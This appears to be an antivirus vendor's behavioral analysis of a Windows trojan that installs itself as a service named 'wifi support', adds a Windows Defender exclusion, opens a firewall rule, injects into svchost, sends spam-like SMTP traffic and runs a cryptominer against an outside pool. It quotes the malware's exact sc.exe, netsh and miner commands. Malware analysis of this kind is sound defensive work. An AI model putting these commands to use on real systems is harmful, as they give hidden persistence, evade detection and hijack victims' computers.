Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\urfsjcqm] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\urfsjcqm] 'ImagePath' = '%WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\urfsjcqm] 'ImagePath' = '%WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe'
Creates the following services
- 'urfsjcqm' %WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe /d"<Full path to file>"
- 'urfsjcqm' %WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\urfsjcqm' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\oeozxxkn.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\oeozxxkn.exe to %WINDIR%\syswow64\urfsjcqm\oeozxxkn.exe
Deletes itself.
Network activity
Connects to
- 'mi##########m.mail.protection.outlook.com':25
- 'mx#######702.gslb.pphosted.com':25
- 'in######.messagingengine.com':25
- 'mx#######e01.gslb.pphosted.com':25
- 'mx##.##il.icloud.com':25
- 'tc####.###l.protection.outlook.com':25
- 'mx######94b01.pphosted.com':25
- 'fo########e.org.1.0001.arsmtp.com':25
- 'mx#.#xcomet.com':25
- 'fo##########ow-com.inbound.emailservice.io':25
- 'ma##.#oodcraft.com':25
- 'mx#######e02.gslb.pphosted.com':25
- 'mx#######601.gslb.pphosted.com':25
- 'mx#######901.gslb.pphosted.com':25
- 'mx##.mb5p.com':25
- 'mx#.#aver.com':25
- 'ge###ator.email':25
- '10#.#8.139.44':443
- 'we############ent-com.mail.protection.outlook.com':25
- 'b.#.##stagram.com':443
- 'cu#######-1.in.mailcontrol.com':25
- 'fa###ool.xyz':10060
- 'ma##.#-email.net':25
- 'mx.####ght.synacor.com':25
- 'ma##.#ope-mail.com':25
- 'sp######n3.bcsdschools.net':25
- 'dn#######stmx01.email.rr.com':25
- 'mx#.#angia.biz':25
- 'mx##.#and1.co.uk':25
- 'ma###.awl.nl':25
- 'ma######er1b.mijndomein.nl':25
- 'mx#######802.gslb.pphosted.com':25
- 'ma##.#omozmail.com':25
- '_d####.####00604dfb.guerrillamail.org':25
- 'mx######6dd01.pphosted.com':25
- 'mx######-com.icoremail.net':25
- 'mx.####iciodecorreo.es':25
- 'le########ebank-com.safesysmail.com':25
- 'mx#.my.com':25
- 'mx#.#harter.net':25
- 'mx.###l-data.net':25
- 'ma##.##errillamail.com':25
- 'mx.######mail.rediff.akadns.net':25
- 'ma##.#ailinator.net':25
- 'ff######x-vip1.prodigy.net':25
- 'ma###.#ailinator.com':25
- 'sn####.gobizmail.com':25
- 'mx##.#mig.gmx.net':25
- 'es##.###002-96.iphmx.com':25
- 'mx###.##stedmxserver.com':25
- 'mx.###zta.onet.pl':25
- 'al######x-vip2.prodigy.net':25
- 'mx##.mail.com':25
- 'mx#######f02.gslb.pphosted.com':25
- 'l0########971.leonardocompany.com':25
- 'ma##.flowja.com':25
- 'mx#.#anmail.net':25
- 'mx#.###612-17.iphmx.com':25
- '10#.#8.138.44':443
- 'mx#.###440-32.iphmx.com':25
- 'mx###.mb5p.com':25
- 'mx.##wway.com':25
- 'mx#######201.gslb.pphosted.com':25
- 'mx####.##il.am0.yahoodns.net':25
- 'mx#######b02.gslb.pphosted.com':25
- 'ho#########.olc.protection.outlook.com':25
- 'mx#######701.gslb.pphosted.com':25
- 'mx#######101.gslb.pphosted.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'ma##.flegg.org':25
- 'mx######91d01.pphosted.com':25
- 'mx#######102.gslb.pphosted.com':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx#######d01.gslb.pphosted.com':25
- 'mx#######801.gslb.pphosted.com':25
- 'mx######dcc01.pphosted.com':25
- 'mx#.#eznam.cz':25
- 'eu#.###.#rotection.outlook.com':25
- 'in#####.registeredsite.com':25
- 'mx.##a.untd.com':25
- 'mx.##attery.com':25
- 'mx#######c01.gslb.pphosted.com':25
- 'mx#.#ate.com':25
- 'ma####b.siol.net':25
- 'aspmx.l.google.com':25
- 'mx#######001.gslb.pphosted.com':25
- 'mx.#len.pl':25
- '17#.#13.115.158':485
- 'sv####lfheim.top':443
- 'lp##.###.1.0001.arsmtp.com':25
- 'mx.#p.pl':25
- 'gr#########sville.com.1.0001.arsmtp.com':25
- 'pu######1.mail2world.com':25
- 'mx.###lprotect.be':25
- 'mx.##gnito.cz':25
- 'mx#.###638-63.iphmx.com':25
- '52.##3.241.7':443
- 'pk#####.#sg.pkvw.co.charter.net':25
- 'ma##.baipai.com':25
- 'ma#####1.tempmail.it':25
- '17#.#94.73.108':993
- 'mt##.##0.yahoodns.net':25
- 'mx.##s.untd.com':25
- 'mx##.#-online.de':25
- 'mx#######402.gslb.gpphosted.com':25
- 'mx.##.#tinternet.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx.##nfare.net':25
- 'google.com':443
- 'mx#.##ckeyecom.net':25
- 'mx#.##tsolmail.net':25
- 'mx###.comcast.net':25
- 'google.com':80
- '17#.#13.115.157':421
- '17#.#13.115.156':421
- '80.#6.75.4':421
- '17#.#13.115.155':421
- '17#.#13.115.154':421
- '17#.#13.115.153':421
- 'in#######mtp.cp.blacknight.com':25
- 'sm##.##cureserver.net':25
- 'mx##.###us-vadesecure.net':25
TCP
HTTP GET requests
- http://www.google.com/
- http://www.google.com/ncr
Other
- 'sv####lfheim.top':443
- 'fa###ool.xyz':10060
- 'cu#######-1.in.mailcontrol.com':25
- 'b.#.##stagram.com':443
- 'we############ent-com.mail.protection.outlook.com':25
- '10#.#8.139.44':443
- 'mx#.#aver.com':25
- '10#.#8.138.44':443
- 'fo##########ow-com.inbound.emailservice.io':25
- 'ma##.#oodcraft.com':25
- 'mx#.#xcomet.com':25
- 'fo########e.org.1.0001.arsmtp.com':25
- 'tc####.###l.protection.outlook.com':25
- 'mx#######702.gslb.pphosted.com':25
- 'ma###.awl.nl':25
- 'mx#.#anmail.net':25
- 'l0########971.leonardocompany.com':25
- 'al######x-vip2.prodigy.net':25
- 'mx.###zta.onet.pl':25
- 'sn####.gobizmail.com':25
- 'ma###.#ailinator.com':25
- 'ma##.#ailinator.net':25
- 'mx.######mail.rediff.akadns.net':25
- 'ff######x-vip1.prodigy.net':25
- 'ma##.##errillamail.com':25
- 'mx#.my.com':25
- 'le########ebank-com.safesysmail.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx.####iciodecorreo.es':25
- 'mx.###l-data.net':25
- 'ma##.#ope-mail.com':25
- 'mx######-com.icoremail.net':25
- 'sp######n3.bcsdschools.net':25
- 'mx###.mb5p.com':25
- '17#.#13.115.158':485
- 'aspmx.l.google.com':25
- 'ma####b.siol.net':25
- 'eu#.###.#rotection.outlook.com':25
- 'in#####.registeredsite.com':25
- 'ho#########.olc.protection.outlook.com':25
- 'mx.###lprotect.be':25
- 'mx####.##il.am0.yahoodns.net':25
- 'gr#########sville.com.1.0001.arsmtp.com':25
- 'mx#.#eznam.cz':25
- '80.#6.75.4':421
- '17#.#13.115.153':421
- '17#.#13.115.156':421
- '17#.#13.115.154':421
- '17#.#13.115.157':421
- 'in#######mtp.cp.blacknight.com':25
- '17#.#13.115.155':421
- 'pu######1.mail2world.com':25
- 'alt1.aspmx.l.google.com':25
- 'ma##.flegg.org':25
- 'google.com':443
- 'mx.##.#tinternet.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mt##.##0.yahoodns.net':25
- '17#.#94.73.108':993
- 'ma#####1.tempmail.it':25
- '52.##3.241.7':443
- 'ma##.baipai.com':25
- 'mx.##gnito.cz':25
- 'mx#.###612-17.iphmx.com':25
- 'lp##.###.1.0001.arsmtp.com':25
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK mx#.#xcomet.com
- DNS ASK fo###tville.org
- DNS ASK fo########e.org.1.0001.arsmtp.com
- DNS ASK mm#.org
- DNS ASK mx######94b01.pphosted.com
- DNS ASK tc#.ie
- DNS ASK tc####.###l.protection.outlook.com
- DNS ASK qu##tel.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK ic##ud.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK ca##ury.com
- DNS ASK in###gram.com
- DNS ASK ay###mail.men
- DNS ASK ex##te.com
- DNS ASK mx#######702.gslb.pphosted.com
- DNS ASK na####valente.com
- DNS ASK in######.messagingengine.com
- DNS ASK fo####studios.com
- DNS ASK ea###links.net
- DNS ASK mx##.mb5p.com
- DNS ASK eg###tings.com
- DNS ASK mx#######901.gslb.pphosted.com
- DNS ASK aw#.us
- DNS ASK ma###.awl.nl
- DNS ASK wp.pl
- DNS ASK mx.#p.pl
- DNS ASK at#.com
- DNS ASK dg.com
- DNS ASK fo##########ow-com.inbound.emailservice.io
- DNS ASK fo####tescrow.com
- DNS ASK ma##.#oodcraft.com
- DNS ASK ma##.#ope-mail.com
- DNS ASK in###htbb.com
- DNS ASK mx.####ght.synacor.com
- DNS ASK po#t.cz
- DNS ASK fm###tal.com
- DNS ASK ti##jo.com
- DNS ASK ma##.#-email.net
- DNS ASK fa###ool.xyz
- DNS ASK am###safe.com
- DNS ASK cu#######-1.in.mailcontrol.com
- DNS ASK b.#.##stagram.com
- DNS ASK oa###odcap.com
- DNS ASK we############ent-com.mail.protection.outlook.com
- DNS ASK ol.com
- DNS ASK fo####nsurance.com
- DNS ASK la###arknet.net
- DNS ASK ge###ator.email
- DNS ASK na##r.com
- DNS ASK mx#.#aver.com
- DNS ASK sh##tel.net
- DNS ASK mx#.#angia.biz
- DNS ASK ho###epot.com
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK ho##ial.com
- DNS ASK da####ssavings.com
- DNS ASK ti###arner.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK wo###raft.com
- DNS ASK ni####eabody.com
- DNS ASK fl##ja.com
- DNS ASK ma##.flowja.com
- DNS ASK tl#n.pl
- DNS ASK ha##ail.net
- DNS ASK mx.###l-data.net
- DNS ASK ch##ter.net
- DNS ASK mx#.#harter.net
- DNS ASK my.com
- DNS ASK mx#.my.com
- DNS ASK le####statebank.com
- DNS ASK le########ebank-com.safesysmail.com
- DNS ASK gr#####rghlibrary.org
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK vi##i.com
- DNS ASK mx.####iciodecorreo.es
- DNS ASK ch##a.com
- DNS ASK mx######-com.icoremail.net
- DNS ASK ps##.com
- DNS ASK mx######6dd01.pphosted.com
- DNS ASK es###orusa.com
- DNS ASK st##toe.com
- DNS ASK gu####llamail.org
- DNS ASK _d####.####00604dfb.guerrillamail.org
- DNS ASK ep##.net
- DNS ASK do###mail.com
- DNS ASK ma##.#omozmail.com
- DNS ASK ko##er.com
- DNS ASK mx#######802.gslb.pphosted.com
- DNS ASK co####orative.org
- DNS ASK va###nnep.eu
- DNS ASK ma######er1b.mijndomein.nl
- DNS ASK lp##.com
- DNS ASK lp##.###.1.0001.arsmtp.com
- DNS ASK pu##z.com
- DNS ASK sh###lasers.com
- DNS ASK ma##.##errillamail.com
- DNS ASK mx.######mail.rediff.akadns.net
- DNS ASK mx#.#anmail.net
- DNS ASK ag####westland.com
- DNS ASK l0########971.leonardocompany.com
- DNS ASK en###pia.com
- DNS ASK pf##er.com
- DNS ASK mx#######f02.gslb.pphosted.com
- DNS ASK ho###alls.com
- DNS ASK ch####ensmercy.org
- DNS ASK ma##.com
- DNS ASK mx##.mail.com
- DNS ASK be###outh.net
- DNS ASK al######x-vip2.prodigy.net
- DNS ASK on#t.pl
- DNS ASK mx.###zta.onet.pl
- DNS ASK re####-for-kids.com
- DNS ASK mx###.##stedmxserver.com
- DNS ASK re####leparts.com
- DNS ASK es##.###002-96.iphmx.com
- DNS ASK gm#.at
- DNS ASK mx##.#mig.gmx.net
- DNS ASK sa###ngcap.com
- DNS ASK sn####.gobizmail.com
- DNS ASK ma###nator.com
- DNS ASK ma###.#ailinator.com
- DNS ASK at#.net
- DNS ASK ff######x-vip1.prodigy.net
- DNS ASK ma###nator.net
- DNS ASK ma##.#ailinator.net
- DNS ASK re###fmail.com
- DNS ASK ea###link.net
- DNS ASK pb#.org
- DNS ASK sp######n3.bcsdschools.net
- DNS ASK bc###chools.net
- DNS ASK sh##nox.org
- DNS ASK os#.edu
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK sl#.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK wa####uardvideo.com
- DNS ASK mx#######102.gslb.pphosted.com
- DNS ASK mo###l.sbc.com
- DNS ASK mx######91d01.pphosted.com
- DNS ASK fl##g.org
- DNS ASK ma##.flegg.org
- DNS ASK st#####.fullerton.edu
- DNS ASK wa###art.com
- DNS ASK mx#######201.gslb.pphosted.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK qr.#om.au
- DNS ASK sd##.bc.ca
- DNS ASK mx#######701.gslb.pphosted.com
- DNS ASK af##c.com
- DNS ASK ab##tt.com
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK ho##ail.com
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK li#e.fr
- DNS ASK pe##es.net
- DNS ASK mx####.##il.am0.yahoodns.net
- DNS ASK pe###evel.be
- DNS ASK am###trade.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK mx######dcc01.pphosted.com
- DNS ASK ac###ture.com
- DNS ASK mx#######801.gslb.pphosted.com
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK fa###mfg.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK o2.pl
- DNS ASK mx.#len.pl
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK fl##-e.com
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK aspmx.l.google.com
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK si##.net
- DNS ASK sv####lfheim.top
- DNS ASK ma####b.siol.net
- DNS ASK mx#.#ate.com
- DNS ASK ci##a.com
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK fl###ery.com
- DNS ASK mx.##attery.com
- DNS ASK ec##und.net
- DNS ASK ne##ero.net
- DNS ASK mx.##a.untd.com
- DNS ASK fl####nsteins.com
- DNS ASK in#####.registeredsite.com
- DNS ASK li#e.se
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK os##o.com
- DNS ASK na##.com
- DNS ASK se##am.cz
- DNS ASK mx.###lprotect.be
- DNS ASK gr#####louisville.com
- DNS ASK mx#.#eznam.cz
- DNS ASK st####yworks.com
- DNS ASK ne###ape.net
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK ne##ero.com
- DNS ASK mx.##s.untd.com
- DNS ASK ro###tmail.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK am##.com
- DNS ASK th###hinfu.com
- DNS ASK te##mail.it
- DNS ASK ba##ai.com
- DNS ASK ma#####1.tempmail.it
- DNS ASK ma##.baipai.com
- DNS ASK tw#.com
- DNS ASK pk#####.#sg.pkvw.co.charter.net
- DNS ASK na###nwide.com
- DNS ASK mx#.###638-63.iphmx.com
- DNS ASK co###ncp.com
- DNS ASK mx.##gnito.cz
- DNS ASK wo##ay.com
- DNS ASK mx.##wway.com
- DNS ASK fl#####nnections.com
- DNS ASK mx###.mb5p.com
- DNS ASK aa##.org
- DNS ASK mx#.###440-32.iphmx.com
- DNS ASK am##ak.com
- DNS ASK mx#.###612-17.iphmx.com
- DNS ASK ho###on.rr.com
- DNS ASK cg#2.fr
- DNS ASK se##orp.com
- DNS ASK mx#######402.gslb.gpphosted.com
- DNS ASK ju##.com
- DNS ASK gr#########sville.com.1.0001.arsmtp.com
- DNS ASK pe###ix.co.uk
- DNS ASK mx##.#and1.co.uk
- DNS ASK pe#####ardesigns.com
- DNS ASK sm##.##cureserver.net
- DNS ASK pe##e.net
- DNS ASK in#######mtp.cp.blacknight.com
- DNS ASK ma###world.com
- DNS ASK pu######1.mail2world.com
- DNS ASK google.com
- DNS ASK em##l.cz
- DNS ASK pe#####-properties.com
- DNS ASK pe##le.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK pe###nsight.com
- DNS ASK co##ast.net
- DNS ASK mx###.comcast.net
- DNS ASK pe####ncellars.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK be#.net
- DNS ASK mx#.##ckeyecom.net
- DNS ASK pe#####kmarketing.com
- DNS ASK pe##are.net
- DNS ASK mx.##nfare.net
- DNS ASK di###rds.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK bt###ernet.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK dn#######stmx01.email.rr.com
- DNS ASK mx##.###us-vadesecure.net
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\urfsjcqm\oeozxxkn.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\urfsjcqm\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\oeozxxkn.exe" %WINDIR%\SysWOW64\urfsjcqm\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create urfsjcqm binPath= "%WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description urfsjcqm "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start urfsjcqm' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\urfsjcqm\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\oeozxxkn.exe" %WINDIR%\SysWOW64\urfsjcqm\
- '%WINDIR%\syswow64\sc.exe' create urfsjcqm binPath= "%WINDIR%\SysWOW64\urfsjcqm\oeozxxkn.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description urfsjcqm "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start urfsjcqm
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
